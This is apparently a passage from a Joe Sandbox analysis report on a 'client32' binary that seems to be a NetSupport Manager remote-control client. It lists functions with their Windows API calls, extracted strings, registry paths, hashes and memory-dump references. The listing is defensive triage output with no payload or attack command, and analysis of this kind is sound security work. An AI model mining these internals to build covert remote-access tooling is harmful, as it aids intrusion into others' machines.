                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                  • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                  • API String ID: 4172599486-2052393828
                                                                                  • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                  • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                  • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                  • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                  Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                    • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                    • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                                  • wsprintfA.USER32 ref: 1100977F
                                                                                  • wsprintfA.USER32 ref: 11009799
                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                  • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                  • API String ID: 559337438-1872371932
                                                                                  • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                  • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                                  • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                  • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                                  Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                    • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                    • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                    • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                    • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                    • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                    • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                    • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                    • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                    • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                    • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                    • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                  • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                  • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                  • String ID: 8
                                                                                  • API String ID: 762489935-4194326291
                                                                                  • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                  • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                  • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                  • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                  Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                                  • _memset.LIBCMT ref: 11005240
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                  • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                  • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                                  • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2755257978-4108050209
                                                                                  • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                  • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                  • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                  • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                  Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,76230BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                    • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                                  • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                                  • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                  • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                  • API String ID: 2999768849-588814233
                                                                                  • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                  • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                  • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                  • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                  Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 1101D750
                                                                                  • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                                  • _memset.LIBCMT ref: 1101D77A
                                                                                  • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                                  • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                                  • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                  • String ID: NSMChatSizeWnd
                                                                                  • API String ID: 2883038198-4119039562
                                                                                  • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                  • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                  • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                  • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                  Function 11033470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 110334CA
                                                                                  • _memset.LIBCMT ref: 11033501
                                                                                  • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                  • GetLastError.KERNEL32 ref: 11033534
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • _memmove.LIBCMT ref: 1103357E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                  • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                  • API String ID: 2414640225-228067302
                                                                                  • Opcode ID: 76f9c5726567c3eb2844e41b2fa8f9e8a8cde90983372ff24c802c7d4c115bf6
                                                                                  • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                  • Opcode Fuzzy Hash: 76f9c5726567c3eb2844e41b2fa8f9e8a8cde90983372ff24c802c7d4c115bf6
                                                                                  • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                  Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                  • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                  • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                  • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                  • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleep
                                                                                  • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                  • API String ID: 4250438611-314227603
                                                                                  • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                  • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                  • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                  • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                  Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strncmp.LIBCMT ref: 1100953A
                                                                                  • _strncmp.LIBCMT ref: 1100954A
                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,50D94AA1), ref: 110095EB
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                  • IsA(), xrefs: 110095A5, 110095CD
                                                                                  • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                  • http://, xrefs: 11009535, 11009548
                                                                                  • https://, xrefs: 1100952F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strncmp$FileWrite
                                                                                  • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                  • API String ID: 1635020204-3154135529
                                                                                  • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                  • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                  • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                  • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                  Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                  • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
